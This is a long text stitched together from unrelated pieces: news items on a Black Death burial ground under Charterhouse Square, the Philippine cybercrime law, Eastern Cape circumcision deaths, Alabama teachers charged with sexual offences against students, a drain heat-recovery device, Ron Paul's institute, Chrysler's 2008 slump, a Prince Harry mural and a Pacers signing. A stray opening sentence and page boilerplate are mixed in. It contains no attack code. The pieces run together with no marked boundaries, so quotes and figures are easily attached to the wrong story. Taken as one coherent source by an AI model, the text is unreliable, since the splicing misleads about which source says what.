Perhaps this all explains why it is so often said that “Republicans campaign like Libertarians and govern like Democrats.”
Seven centuries after their demise, the skeletons of 12 plague victims have been unearthed in the City of London, a find which archaeologists believe to be just the tip of a long-lost Black Death mass burial ground.
Arranged in careful rows, the bodies were discovered 2.5 metres below the ground in Charterhouse Square in works for a Crossrail tunnel shaft beside the future ticketing hall for Farringdon station.
Tests are needed to confirm the skeletons' provenance, but the discovery should shed more light on life and death in 14th-century Britain and help scientists to understand how the plague mutated.
Crossrail's lead archaeologist, Jay Carver, said: "This is a highly significant discovery and at the moment we are left with many questions we hope to answer. However, at this stage, the depth of burials, the pottery found with the skeletons and the way the skeletons have been set out, all point towards this being part of the 14th-century emergency burial ground."
Historical records contain references to a burial ground in what was then "no man's land", and archaeologists have long believed excavations would turn up bodies.
But this is the first sign of what John Stow's 1598 Survey of London suggested could contain as many as 50,000 bodies.
Experts now believe that is "something of an exaggeration", according to Nicholas Elsden ,of the Museum of London, who is working on the site. But he said there could be hundreds more buried under the gardens in Charterhouse Square.
The first skeletons were laid out in neat rows, suggesting that they died in an early wave while the authorities – the then lord mayor – had made provision for the impending disaster coming from the continent.
While the fast-train project promised to relieve congestion in the capital, work on Crossrail has now turned up so many bodies that archaeologists at the Museum of London admit that storage is becoming a problem.
Despite the considerable scientific interest in the site, archaeologists are content to limit themselves to studying the skeletons discovered in the shaft.
Crossrail works have already meant excavating 300 skeletons with up to 4,000 from the 17th-19th centuries expected from the Bethlem "Bedlam" hospital burial ground, now the site of Liverpool Street's new station.
These bodies will be stored in the museum for up to two years before reburial. Elsden said specialist exhumation contractors have been called in to help.
Most of the Bedlam dead will end up reburied, with a Christian memorial service, in Canvey Island in the Thames estuary.
The rarer bones of the Black Death victims, lying untouched for seven centuries, are likely to kept overground a little longer for research.
Don Walker, an osteologist examining one of the skeletons at the Crossrail site, said the bones belonged to a man, under 35, with decent teeth and, for a plague victim, in otherwise good shape.
But the Black Death, which cut down almost two-thirds of London's population, had killed too quickly to leave a visible trace on the skeleton. "Something acute like plague, you don't get the marks on the bones," Walker said, but added that bacterial DNA could still be present and hold lessons for microbiologists studying the evolution of disease.
Barney Sloane, author of The Black Death in London, said: "An emergency cemetery is a really uncommon find: they were open for a very short while in response to a disease that wiped out 60% of London in months.
"They give us a snapshot of the health, lifestyle and demographic make up of London – and since the plague killed indiscriminately there should be a good cross-section."
Construction of Crossrail, which has involved excavation for stations and tunnels across London, has thrown up treasures from the past, including amber and 68,000-year-old mammoth bones at Canary Wharf.
Crossrail was quick to reassure that there was no risk to workers or the public from the skeletons. If there were, said Elsden, who helped to unearth the other known mass burial ground in Spitalfields in the 1980s, "myself and my colleagues wouldn't be here".
Senate President Juan Ponce Enrile defends the cybercrime law, questions the absence of constitutional law expert Sen Miriam Defensor-Santiago when bill was passed
Published 1:39 AM, October 08, 2012
MANILA, Philippines - Senate President Juan Ponce Enrile on Sunday, October 7, backed the Cybercrime Prevention Act of 2012 but admitted he doesn't remember the online libel provision during discussions on the law and was absent when the controversial bill was approved.
In a radio interview with DZBB, Enrile pointed to other senators who he said should have looked at the bill more closely during debates in the Senate, adding that he is busy with other duties as Senate President.
"Si [Sen] Miriam [Defensor-Santiago] ang constitutionalist namin, bakit wala siya dun? Ako naman absent ata ako nung inaprubahan yun. Hindi ko naman mauusisa lahat ng batas diyan. Andun ang minority, sila dapat ang umusisa diyan sa ginagawa ng majority," he said.
(Miriam is our constitutionalist, why wasn't she there? I think I was absent when it was passed. I can't be there to scrutinize every single bill. The minority is there, they should have studied what the majority was proposing).
Enrile however said he will leave it to the Supreme Court to ultimately decide on its constitutionality.
"Ipaubaya natin sa Korte Suprema. Yan ang sistema namin. Hindi naman namin sinasabai na lagi kaming tama," he said. "Kung nagkamali kami… andiyan ang Korte Suprema."
(Let's leave it to the Supreme Court. That's our system. We're not saying we're always right. If we're wrong… the Supreme Court is there).
Since the law was passed in September, more than 10 petitions have been submitted to the Supreme Court questioning the constitutionality of the Cybercrime Law. Several senators have also filed bills to amend the law.
A constitutional law expert, Santiago has since said the Cybercrime Law is unconstitutional.
In a speech delivered at Adamson University on October 6, Santiago said the Constitution promotes free speech, as in the provision: “No law shall be passed abridging the freedom of speech.”
Defending the law
Enrile said he doesn't know much about the Internet, but said the newly passed cybercrime law is necessary to maintain order. He fired back at critics of the bill who say it threatens their freedom of speech.
"Gusto nila, yung iba, absolute right, absolute freedom. There's no such thing as absolute freedom. You must orient your right to the rights of other people," he said. "Otherwise we will go back to the jungle."
Enrile also voiced his support for the controversial provision that criminalizes online libel, citing the scope of the Internet in defending the harshness of the punishment. He said compared to books or newspapers that have a contained reach because of its distribution, the Internet's scope is much greater.
"Sa Internet, worldwide yan. Imagine the destruction you can create," he said.
"Malawak yan eh. Hindi mo na matatanggal yun (It's wide-reaching. You won't be able to just delete what you post)."
The 88-year-old lawmaker cited calls online not to vote for senatoriables who passed the law as an example of why the online libel provision is needed.
"Imagine using that kind of instrument to malign their defenseless targets," he said.
He added that the hackers who have broken into government websites also highlight the necessity of the law. Since the law was passed, a group of hackers who call themselves Anonymous Philippines have repeatedly attacked several government websites, to protest the act.
"Pababayaan nalang ba natin? Ganyan ba ang gusto natin sa ating lipunan? My god, every society should have a certain degree of order," he said.
(Will we just let them be? Is this what we want for our nation, our society?) - Rappler.com
Circumcision deaths worry MEC
Johannesburg - The number of deaths at circumcision schools in the Eastern Cape is rising, Traditional Affairs MEC Mlibo Qoboshiyane said on Tuesday.
"It has come to our attention that at least 20 young men died in a number of our schools within a short space of time," Qoboshiyane said in a statement on Tuesday.
"The fact that many young boys are circumcised without consent and knowledge of their parents creates a fertile ground for deaths, amputations and [the] hospitalisation of initiates."
The MEC called on men in rural communities to help single women find reliable and legitimate circumcision schools for their children.
"This is an important aspect of our life that must not be left to chancers who want to make money out of youngsters. We need to restore the dignity of traditional circumcisions, so as to build responsible and healthy young men in our province."
The circumcision death toll in the province was not provided.
In December, hospitals in Mthatha were inundated with young men injured from botched circumcisions.
The health department's spokesperson Sizwe Kupelo at the time said the All Saints Hospital in Engcobo had admitted 33 initiates, and had to arrange referrals for their injured friends as the wards were full.
Cell phones. Apps. We say and do things on social media and cell phones that we wouldn't say and do in person," Blount Count DA Pamela Casey
A Mobile math teacher is convicted of having sex with a teenager. A fifth-grade teacher is implicated in Pell City. A foreign language teacher is charged in Tuscaloosa. A Sheffield Junior High School teacher, in a car, having sex, with a 15-year-old.
All of the accused are women. In fact, about one-third of the cases of possibly inappropriate relationships investigated by Alabama education officials in 2013 involved women.
"It may not be happening more, but now there's more punishment,'' said Josh Klapow, a clinical psychologist and associate professor at UAB's School of Public Health. "We don't know those incidents that aren't being caught and aren't being reported."
Social media, authorities say, helps to fuel the fire.
"Cell phones. Apps. We say and do things on social media and cell phones that we wouldn't say and do in person,'' said Blount County District Attorney Pamela Casey who, on Monday, announced a guilty plea in the case of a Susan Moore High School teacher who admitted to sexting (sending nude pictures via text message) to a 15-year-old student. "As a result, there's a wall that's been removed. Things people would never say to a person they now will say over the phone or on Facebook or things of that nature. We just live in a different world."
A 2010 law made it a felony for a school employee to have sex with a student 19 or younger. (Other Alabama laws had set the age of consent at 16). Since then, high- profile cases were brought against women teachers on charges ranging from sodomy to rape of underage students. More is under investigation.
Between 2008 and 2013, there have been about 150 cases of inappropriate relationships reported to the Alabama Department of Education. These "relationships" include not only sexual intercourse between a teacher and a student, but also inappropriately romantic or sexual communications between the two, said Susan Tudor Crowther, an attorney in the Office of General Counsel for the Alabama Department of Education.
For 2013, 66 percent of those complaints involved male teachers, while 34 percent involved female teachers. Are the numbers on the rise? It appears so, said Crowther who recently wrote an article for a trade publication called "Hot For Teacher: When Good Teachers Go Bad."
"It is not clear why they appear to be on the rise. It is possible that we are simply getting more reports of such behavior,'' Crowther said. "In 2010, a law was passed criminalizing sexual relationships between teachers and students. This may have prompted increased reporting. "
Before the infamous 1997 case of Mary Kay Letourneau, who twice became pregnant by her 12-year-old student and eventually married him in 2005, such prosecutions seemed rare.
Kathryn Seigfried-Spellar, assistant professor of criminal justice at the University of Alabama, said she isn't aware of any increase in the number of female teachers accused of sexual relationships with underage students. "I think we need to remember there is a double standard in society,'' she said. "A male teacher arrested for having a sexual relationship with an underage (female) student may not be as 'newsworthy' compared to the female teacher having a sexual relationship with an underage (male) student."
The apparent influx, Seigfried-Spellar said, might stem from the fact that victims are now more willing to report the crimes. "In other words, these types of sexual relationships between female teachers and underage students may have always existed, but went unreported,'' she said.
UAB's Klapow said it's important to remember that while many of these cases involve "consensual" sex, many of these teens are too young to know what that means. "When you're talking about a 29-year-old woman and 14-year-old boy, no matter how consensual, it's not truly consensual because that boy is in a psychologically vulnerable situation,'' he said. "From my position, psychologically by definition it's not consensual by nature of the relationship. While intellectually and physically consensual, psychologically it can't be."
The closer in age it gets, the more the lines get blurred, he said, such as a teacher in her mid-20s with a 17-year-old boy. "It's still nowhere near appropriate, but physically the attraction can be there. Is it completely inappropriate, illegal and stupid? Yes,'' he said.
Students, he said, often develop what they think are feelings for their teachers, much like patients do with their doctors and therapists, and clients and lawyers. "The feelings of intimacy get clouded because you have a teen feeling close to the teacher, and that's misinterpreted as love."
Technology has made it worse. "Text messages can fuel the relationship, perpetuate miscommunication and foster misinterpretation,'' Klapow said. "A text with a smiley face or 'I care about you' can be misinterpreted."
Texting, sexting, and other electronic messaging provides access like never before. "Before there was less touchpoint,'' he said. "Sexting can absolutely support this continued, inappropriate but real set of feelings."
So, what's in it for the older women? "They're thinking about how they feel, the excitement and the attention they're not getting someplace else,'' Klapow said. "They're doing what lots of people do, which is having an inappropriate relationship for sexual and emotional reasons."
Recent high profile cases in Alabama:
- On Monday, former Susan Moore High School teacher Crystal Gilliland Clowdus, 32, pleaded guilty to transmitting obscene material to a child. Court records show Clowdus sent nude and partially nude pictures of herself to a 15-year-old male student. She was sentenced to 10 years in prison, with nine of those years suspended. She will serve six months in jail and six more months on house arrest. She will be on probation for five years, a lifetime sex offender, and forced to surrender her Alabama teaching certificate.
-Alicia Gray, a 28-year-old Mary G. Montgomery High School math teacher was convicted Jan. 10, 2014 of having sex with a student under the age of 19. Her victim was 14. She was sentenced to a five-year split sentence, with six months to serve and five year probation. She also surrendered her teaching certificate. She made this video apology
- Jennifer Collins McNeill, a 39-year-old sixth grade teacher and cheerleading sponsor in Thorsby, was indicted Feb. 14 on six counts of second-degree rape and two counts of second-degree sodomy. Authorities said McNeill had sex with a 14-year-old boy, the same boy, a number of times, but prosecutors chose to seek indictments on the eight best cases. Though no longer employed by the school system, McNeill is free on $160,000 bond. Her arraignment is set March 10.
- Stephanie Suggs Millard, 34, pleaded guilty in December 2013 and was sentenced to 10 years in prison, but the sentence was suspended. Instead, the former Spain Park High School teacher will be under the supervision of a state probation officer. She will also have to register as a sex offender and complete a sex offender program. Millard was arrested in 2012 after authorities learned she had sex with a 17 year old male student over a two-month period.
- Catherine Michelle Bell, 33, the assistant principal at Pelham High School, was arrested in December 2013 and charged with three counts of "School Employee Engaging in a Sex Act or Deviant Sexual Intercourse with a Student Under the Age of 19 years." Authorities didn't release specifics about the allegations against Bell. She was one of four assistant principals at the high school. Court records show she and her husband divorced in August 2013, and have shared custody of a 4-year-old son. Her case is set to go on trial Wednesday, but is expected to be continued.
- Selma Middle School teacher LaTengala Williams was arrested April 19, 2013 on charges relating to sexual misconduct. She is charged with possession of obscene matter containing visual depiction of persons under 17 years of age involved in obscene acts, electronic solicitation of a child, enticing a minor for immoral purposes and school employee having sexual contact with a student. Efforts to obtain a disposition on her case were not available in Alabama court records.
- Heather Whitten, a 38-year-old fifth-grade teacher at Williams Intermediate School in Pell City, was convicted in 2012 of second-degree rape, meaning she had sex with someone between the ages of 12 and 16. Married with three children, Whitten was sentenced to 5 years, a split sentence with one year to serve.
- Jennifer Hawk Elebash, 41, was a teacher at Central High School in Tuscaloosa. The foreign language teacher was charged with engaging in a sex act or deviant sexual intercourse with a student under the age of 19, one count of school employee having sexual contact with a student under the age of 19, and one count of harassment. She was scheduled to go on trial Monday, but her case was removed from the docket. No other information was immediately available.
- Amy Kathleen Caudle, 31, was a special education teacher at Andalusia Middle School. She was found guilty in 2011 of sexually abusing three students. She entered guilty pleas for two counts of second-degree sodomy after she was arrested after admitting that she performed oral sex on two underage victims. She was sentenced to 15 years with 12 under supervised probation. She also surrendered her teaching certificate.
- Amanda Watkins, 39, was a former Sheffield Junior High teacher convicted in 2011 of raping a 15-year-old student. She was sentenced to 10 years in prison, and released after serving nearly two years. She will serve the remainder of her sentence under supervision by the Colbert County Community Corrections Center. She was convicted of rape and sodomy for having sex with a former student in the school parking lot. The student was 15, and the sex took place in the back seat of her car.
The tube and coil Gravity Film eXchanger (GFX) system is installed on the drain line of a plumbing system in order to extract heat from draining wastewater, no matter how dirty it is.
Over the past decade, advancing heat exchanger technologies have been penetrating the U.S. market. Paralleling the advances in technology are an increasing interest in the cost benefits of efficient use of energy resources, as well as other concerns about resource management. The efficient management of heat resources already available within the plumbing and mechanical systems is an effort to turn a “waste stream” into a “resource stream” or commodity.
The process of heat transfer through fluid-to-fluid heat exchangers is based on basic properties of heat conduction. When two independent chambers or circuits carrying fluids with a temperature difference are touching, the heat always moves to cold, trying to find equilibrium. Two important factors in the effectiveness of heat transfer are the amount of surface area that comes in contact with the heat source and the materials used to conduct the heat.
Gravity Film eXchanger (GFX)
Gravity Film eXchanger (GFX) is a tube and coil drain heat recovery (DHR) system that works as a simple plumbing device. This well-engineered plumbing device transfers heat from drainwater to preheat incoming cold water through a copper supply line mechanically wrapped in a coil around a copper DWV pipe/tube. The key to the effective heat transfer is the large amount of copper surface area in contact with the thin, falling film of drain water. When wastewater drains through a vertical pipe, it does not fall down the center. Instead the water clings to the inner surface of the DWV pipe as it displaces the air in the pipe, taking the path of the least resistance and obeying natural properties of surface tension. The water travels down the inner pipe walls in a thin, turbulent film that allows efficient heat transfer through the pipe wall. This falling film system will not work in the horizontal position; it must be vertical to distribute the hot fluid over a large surface area of copper drainpipe.
Tube and Coil Drain Heat Recovery
Drain Heat Recovery (DHR) is the capture of energy contained in drainwater that would otherwise be lost into the sewer system. Common sources include showers, sinks, clothes washers, dishwashers, and many other locations. The U.S. Department of Energy's Energy Information Administration (EIA) estimated that in 1995, residential water heaters consumed 740 billion kWh of energy, and commercial water heaters consumed 320 billion kWh. Approximately 80-90% of this energy goes down the drain, carrying with it billions of kWh and billions of dollars. Efforts to recover this energy, such as the tube and coil GFX system, can result in significant energy savings. As hot water goes down the drain, the GFX efficiently transfers the heat through the walls of the copper drain line to the cold water as it simultaneously flows up through the supply coil. Depending on the amount of use and the size of the system, 50-85% of the drain heat can be transferred to the cold supply water through the copper without contamination. The heat recovery significantly preheats the incoming water, thereby reducing the work of water heaters and greatly reducing the amount of energy/money spent to heat water.
Construction
Two standard plumbing components make up the Gravity Film eXchanger (GFX) units. They are type L copper water supply tubing and copper Drain Waste Vent (DWV) pipe. The supply tubing is mechanically attached by tightly coiling it around the DWV pipe. This construction maintains the UPC-listed parts in the product, making it double walled with leak detection, vented through the atmosphere. The double-wall vented construction in GFX drain heat recovery systems is necessary to ensure public safety by preventing cross-contamination, and it is mandatory in food processing applications and most residential plumbing codes. The copper material used is economical, as well as being an excellent conductor of heat. The unique, non-welded construction is easy to install and maintain. The GFX is constructed in a large variety of sizes with additional options for customization. Lengths of 2″, 3″, and 4″ are the most common sizes for the DWV pipe and 5/8″ and 7/8″ OD (Outside Diameter) are the common sizes for supply tubing. Unit lengths typically range from 20″ to 80″. Manifolded units are commonly used for commercial applications. The variety and versatility of GFX systems can fit the designer and engineer's imagination.
Applications
GFX as a heat exchange system can be used wherever sufficient temperature difference exists between fluids. There are many drain heat recovery applications in residential, commercial and industrial situations. Some of these are:
Single family homes, apartment buildings, and multi-family developments.
Hotels, hospitals, dormitories, and senior living facilities.
Prisons and military facilities.
Gyms and public showers.
Beauty salons and laundries.
Commercial kitchens, restaurants, food processors, etc.
Cooling-walls, manufacturing, and process fluids in industrial applications.
The plumbing systems of such locations have the perfect mix of waste heat and demand for hot water to justify using GFX systems for preheating water.
The GFX is a counter-flow heat exchanger. In its most common application it is installed vertically as a section plumbing drain line. The cold supply line goes into the bottom of the GFX outer coil, and then the top of the coil is connected to the incoming cold water line just before the water heater, directly to the cold side of the shower fixture, or to both. The GFX recovers heat if the warm wastewater is flowing at the same time as the cold supply water. This is easy for showers and sinks; however, to recover heat from batch processes such as bathtubs, clothes washers and dishwashers there must be a second demand for cold water supply occurring as the batch is draining or shortly after. This can easily be done with a little effort in residential situations, and with some synchronization in commercial applications.
The typical household percentage of hot water sent down the drain from showers and running faucets is about 57%, based upon a published study from Lawrence Berkeley Laboratory.(2) DHR efficiency of 60% is cost-effective in many homes; corresponding to a 34% reduction in domestic hot water energy. This figure was used in a comprehensive study entitled, “Electric Water Heating Situation Analysis,” by A.D. Little, Inc. for the Edison Electric Institute and the U.S. Department of Energy.(3)
The economics of the GFXimproved with the number of daily showers in the residence. In general, buildings that require large amounts of hot water for showers would be ideal candidates for the GFX and would lead to shorter paybacks.
Example:Figuring the potential energy in shower drain water per 12-minute shower, here is the calculation:
Q = F x (To-Ti) x 8.34 x 12
Where:
Q = power available from shower drain water in Btu per shower (Btu/Shr)
F = flow rate down the drain in gallons per minute (gpm)
To = temperature of the drain water out (degrees F)
Ti = temperature of cold supply water (degrees F)
8.34 = the heat capacity of water in Btu per gallon per degrees F temperature difference (Btu/gal-degrees F)
12 = the national average minutes per shower
For a 3.0 gpm shower with 95 degrees F drain water (105 degrees F shower cooling to 95 degrees F on the way to the drain) and 50 degrees F cold water supply:
Q = 3.0 x (95 – 50) x 8.34 x 12
= 13,500 Btu per shower or 3.96 kilowatts
With 60% recovery efficiency, the GFX can recover 8,106 Btu or 2.38 kW per shower and deliver that energy to the water heater or directly to the cold side of the shower fixture. That 2.38 kW is enough energy to run more than 200 11-watt compact florescent light bulbs for an hour.
Ron Paul has been retired from Congress for only a few months, but he's certainly not shying away from politics. The former US representative has already announced his new project: the Ron Paul Institute for Peace and Prosperity.
In a press release sent to the media Friday afternoon, the Ron Paul camp confirms that the long-time Texas representative will launch a think-tank of sorts in order to carry on his ideologies after his time in office has ended.
“After decades in and out of the US House of Representatives leading the call for a non-interventionist foreign policy and the protection of civil liberties, Dr. Paul is launching a revolutionary new vehicle to expand his efforts. The Institute will serve as the focal point of a new coalition that crosses political, ideological and party lines,” the statement begins.
According to the press release, the Ron Paul Institute will focus mainly on two issues: education and coming generations.
“It will fill the growing demand for information on foreign affairs from a non-interventionist perspective through a lively and diverse website, and will provide unique educational opportunities to university students and others,” his office says.
“The neo-conservative era is dead. The ill-advised policies pushed by the neo-cons have everywhere led to chaos and destruction, and to a hatred of the United States and its people. Multi-trillion dollar wars have not made the world a safer place; they have only bankrupted our economic future. The Ron Paul Institute will provide the tools and the education to chart a new course with the understanding that only through a peaceful foreign policy can we hope for a prosperous tomorrow.”
Ron Paul, 77, says he will formally unveil his latest endeavor next Wednesday at a conference in Washington, DC, only a stone's throw from the congressional office he occupied for nearly three decades. Slated to attend the conference are the members of the Institute's board of advisors, which contains a number of high-profile names including noted economist Lew Rockwell, the CEO of the Ludwig von Mises Institute and a longtime collaborator of Paul's — he served as the congressman's chief of staff from 1978 to 1982, and later advised the politician as he vied for the presidency.
Also on the Institutes board is Rep. Walter Jones, Jr. (NC), Rep. John Duncan, Jr. (TN), former Rep. Dennis Kucinich (OH) and Judge Andrew Napolitano.
Just earlier this month, Ron Paul unveiled his own homeschooling curriculum for students, which he describes as a program aimed to provide “education in liberty like no other.”
“Students will be exposed to thinkers they would never encounter in a government school. They will know history and economics better than anyone their age,” Rockwell wrote in an editorial announcing the start of the “Ron Paul Curriculum” published in The Daily Bell.
Updated SEO Crawler: Version #296
Update: We've been hard at work and have a newer version of our site crawler, don't worry though we've updated all the download links across the site so you won't get an old version.
Changes:
Google Drive (Spreadsheet) Export (Let us know what you think, if you want us to make this automated)
(Let us know what you think, if you want us to make this automated) All URLs added to XLS Export
Bug Fixes
Download
Don't forget you'll need Java installed on your computer to run our software (most will have this installed already)
If you like it share it
On your Facebook, Twitter, Google+ or whatever else you use 🙂
Find a bug, got an idea or any comment?
Put it in the comments or goto our contact page!
The announcements come with vehicle sales in the United States at the lowest level in 26 years. Chrysler's sales were down 47 percent in November, compared with a 37 percent decline for the industry over all.
Chrysler's chief executive, Robert L. Nardelli, told Congress this month that the company needed an immediate loan of $7 billion to help it survive into the new year. Senate Republicans blocked aid to Chrysler and the other Detroit automakers last week, but the Bush administration is expected to step in with some form of aid.
G.M., which has said it needs $4 billion this month to stay afloat and an additional $14 billion after that, said last week that it would shut 20 assembly plants in North America for at least part of the first quarter.
“People just don't want to buy cars,” Anthony Viviano, the chairman of Sterling Heights Dodge and Meadowbrook Dodge near Detroit, said. “Hopefully, by Friday the president O.K.'s this thing. We just have to calm everybody down.”
Mr. Gilman's letter, first reported Wednesday by Bloomberg News, showed that dealers were feeling jittery along with their would-be customers.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
“They don't know what to do. They're just running wild,” Mr. Viviano said.
Without access to financing, few Chrysler dealers would be able to order new vehicles.
“Chrysler Financial finances 75 percent of all vehicles shipped to U.S. dealers, and we continue to support our dealer body with uninterrupted wholesale financing,” a Chrysler Financial spokeswoman, Amber Gowen, said.
Chrysler said its dealers, during a recent meeting at the company's headquarters in Auburn Hills, Mich., told executives that they had lost 20 percent to 25 percent of their volume because consumers were unable to obtain loans.
Advertisement Continue reading the main story
“They have many willing buyers for Chrysler, Jeep and Dodge vehicles but are unable to close the deals, due to lack of financing,” Chrysler said in a statement.
In addition to idling their plants, automakers have been trying to save money by shrinking the size of their work force.
In November, Chrysler cut about 5,000 salaried jobs through a buyout and early retirement program. By the end of this month, it is expected to have eliminated more than 1,800 hourly positions.
Workers at the plants will be laid off during the downtime, but a supplemental unemployment program ensures that they will continue to receive most of their pay. The United Automobile Workers union agreed this month to suspend the company's jobs bank programs, which compensate workers for permanent closures, but it is unclear when that change will take place.
Foreign automakers have been reacting to the slowdown, too. Toyota said this week that it would delay work on a factory in Mississippi that would build the Prius hybrid, and Honda said it was cutting first-quarter production by 119,000 vehicles.
ES News Email Enter your email address Please enter an email address is invalid Fill out this field Email address is invalid You already have an account. Please log in or register with your social account
A street artist was stopped and searched by police as he drove a van decorated with a naked Prince Harry and scantily-clad Meghan Markle close to Buckingham Palace.
Passers-by stopped to ogle and take pictures as artist Pegasus paraded the eye-catching mural through London on Wednesday in celebration of the royal couple's recent engagement.
The anonymous artist, who was born in the US and now lives in London, began preparing the stencil painting last Monday as speculation of the couple's engagement reached fever pitch.
“I'm a huge fan of the royal family,” Pegasus told the Standard. “I actually really love and admire them.
“I know my work sometimes comes across a rude but it's more of my twisted mind. I love to do tongue in cheek pieces.”
His latest piece, sprayed onto the back of a black van, shows a mock scene from the royal couple's stag and hen nights alongside the word ‘party' in bright pink lettering.
Ms Markle, 36, is pictured baring her midriff while wearing the costume made famous by Madonna in her 1984 hit Like A Virgin music video, with the words “Boy Toy” written above her crotch.
Meanwhile her fiancé Prince Harry, 33, is shown in the buff holding a can of spray paint and what appears to be a crown in front of his genitals.
Artist Pegasus, who keeps his identity hidden, is known for his spray paintings across London including Hillary Clinton as Wonder Woman and other stars such as Kim Kardashian, Cilla Black and Kate Middleton.
The moving art installation was driven through the streets of London and passed Westminster Abbey, Trafalgar Square and busy Bond Street.
He said he was pulled over by police officers who noticed the mural and heard the sound of soup cans, which he had tied to the vehicle to attract extra attention.
“I think the van raised a few red flags,” Pegasus said.
“The police wanted to search inside the van so pulled us over. One asked, ‘what are you actually doing?' I said I'm celebrating the announcement.
“They asked, ‘do you think it's funny?' and said don't drive round this area.”
Last November, the street artist was quick off the mark with his first piece of street art of Meghan Markle, showing the Suits actress accompanied by two Queen's Guards on a wall in Highbury and Islington alongside the caption “Harry's girl”.
Pegasus is such a fan of the royals that he is signed up for Google alerts for news of the famous family and said he started planning today's Harry and Ms Markle piece a year ago, shortly after the couple went public with their relationship.
“When I sat down designing this piece I was listening to Madonna and I had this theme in my head,” Pegasus said.
“I started to think of a hen party, I have seen lots of girls dress up as Madonna for hen parties and thought it would be fun.”
He said Harry “has been a good boy lately” but thought a stag party scene would be an opportunity to show the prince's wild past.
Pegasus said the couple's engagement is “the thing we need to pick us up”.
“It's been a tough year,” he said. “Something like this is the thing we have all been waiting for.”
Pegasus Street Art - In pictures 27 show all Pegasus Street Art - In pictures 1/27 Amy Winehouse Pegasus 2/27 Meghan Markle Pegasus 3/27 Tribute to George Michael Pegasus 4/27 Kim Jong-un Pegasus 5/27 A Karl Lagerfeld Street Art tribute by Pegasus in London with assistance from Global Street Art Pegasus 6/27 Madonna Pegasus 7/27 Prince Harry and Meghan Markle Getty Images 8/27 Aretha Franklin Pegasus 9/27 Pegasus Prince Harry and Meghan Markle Moving Street Art Installation around London Pegasus 10/27 Donald Tump Statue of Liberty Pegasus 11/27 Pegasus strikes with a powerful Donald Trump artwork Pegasus 12/27 Theresa May 'Dressed to Kill' Pegasus 13/27 Kate Moss Pegasus 14/27 David Bowie Pegasus 15/27 Amy Winehouse Jeremy Selwyn 16/27 Tribute to Carrie Fisher Pegasus 17/27 18/27 Theresa May and Donald Trump Pegasus 19/27 Hillary Clinton Pegasus 20/27 Depiction of a Syrian boy pulled from the rubble after airstrikes in Aleppo Pegasus 21/27 Street artist Pegasus poses for photographers at an exhibition celebrating the life of musician Amy Winehouse at the Jewish Museum in Camden, Joel Ryan/Invision/AP 22/27 Tribute to George Michael Pegasus 23/27 Amy Winehouse Jeremy Selwyn 24/27 Tribute to Carrie Fisher Pegasus 25/27 Amy Winehouse Pegasus 26/27 St Giles Hotel unveils works by London street artist Pegasus Pegasus 27/27 St Giles Hotel unveils works by London street artist Pegasus Nigel Howard 1/27 Amy Winehouse Pegasus 2/27 Meghan Markle Pegasus 3/27 Tribute to George Michael Pegasus 4/27 Kim Jong-un Pegasus 5/27 A Karl Lagerfeld Street Art tribute by Pegasus in London with assistance from Global Street Art Pegasus 6/27 Madonna Pegasus 7/27 Prince Harry and Meghan Markle Getty Images 8/27 Aretha Franklin Pegasus 9/27 Pegasus Prince Harry and Meghan Markle Moving Street Art Installation around London Pegasus 10/27 Donald Tump Statue of Liberty Pegasus 11/27 Pegasus strikes with a powerful Donald Trump artwork Pegasus 12/27 Theresa May 'Dressed to Kill' Pegasus 13/27 Kate Moss Pegasus 14/27 David Bowie Pegasus 15/27 Amy Winehouse Jeremy Selwyn 16/27 Tribute to Carrie Fisher Pegasus 17/27 18/27 Theresa May and Donald Trump Pegasus 19/27 Hillary Clinton Pegasus 20/27 Depiction of a Syrian boy pulled from the rubble after airstrikes in Aleppo Pegasus 21/27 Street artist Pegasus poses for photographers at an exhibition celebrating the life of musician Amy Winehouse at the Jewish Museum in Camden, Joel Ryan/Invision/AP 22/27 Tribute to George Michael Pegasus 23/27 Amy Winehouse Jeremy Selwyn 24/27 Tribute to Carrie Fisher Pegasus 25/27 Amy Winehouse Pegasus 26/27 St Giles Hotel unveils works by London street artist Pegasus Pegasus 27/27 St Giles Hotel unveils works by London street artist Pegasus Nigel Howard
The couple announced on Monday they are to wed following a 16-month relationship after being introduced by a mutual friend.
The wedding will be held in May next year at St. George's Chapel at Windsor Castle.
Speaking in their first interview since getting engaged, Harry said he asked his fiancée to marry him during a night in while they were roasting a chicken.
Harry designed the ring himself using a stone from Botswana, where the couple holidayed together after just a few dates, and two diamonds from his late mother Princess Diana's personal collection.
The pair will visit Nottingham on Friday for their first official royal engagement together.
CLOSE Pacers guard Donald Sloan is thrilled with the team's signing of C.J. Miles, a player he's known since their middle-school days in the Dallas area. (Phillip B. Wilson / The Star)
Pacers' Donald Sloan keeps his eye on Cleveland's Jarrett Jack at Bankers Life Fieldhouse Saturday November 2, 2013. The Pacers won 89-74. Chris Bergin/ for The Star (Photo: Chris Bergin)
They've known each other since middle school while growing up in Dallas, so Indiana Pacers guard Donald Sloan was as excited as anyone about Wednesday's signing of free-agent wing C.J. Miles.
"That's my guy," Sloan said after Thursday's Summer League workout at Bankers Life Fieldhouse. "We're both from the Dallas area, played against him in high school and AAU, played with him in Cleveland last year before my release. He's going to be a great addition to this organization."
They were texting before Miles' four-year, $18-million deal was announced. Sloan didn't want to get his hopes up too soon.
"He told me it was possible and I was like, 'You're probably going to meet with five other teams,' " Sloan said. "Once I actually saw it on the little free agency tracker, (I said), 'He got it done.'
"I hit him up and we've just been joking ever since. He's like, 'Now I need you to stay since I'm here now.' "
HILL'S ROOKIE WOES: 'I let myself down and let the Pacers down as well'
PACERS BENCH: Larry Bird forced to reconstruct reserves again
Sloan joined the Pacers last season and appeared in 48 games with one start. He realizes summer league is the time to prove his worth for next season.
"He did his part, now I've got to do my part," he said. "It's tough, but at the same time, if you trust in your work, you trust your abilities, everything else will fall into place whether it's here or somewhere else.
"Now you get new faces, new bodies and an actual game-like look as far as 40 minutes (per game), that's great."
NEWSLETTERS Get the IndyStar Motor Sports newsletter delivered to your inbox We're sorry, but something went wrong The latest news in IndyCar and the world of motor sports. Please try again soon, or contact Customer Service at 1-888-357-7827. Delivery: Sun - Fri Invalid email address Thank you! You're almost signed up for IndyStar Motor Sports Keep an eye out for an email to confirm your newsletter registration. More newsletters
And if he can lock down a roster spot for 2014-15, he will enjoy playing again with Miles.
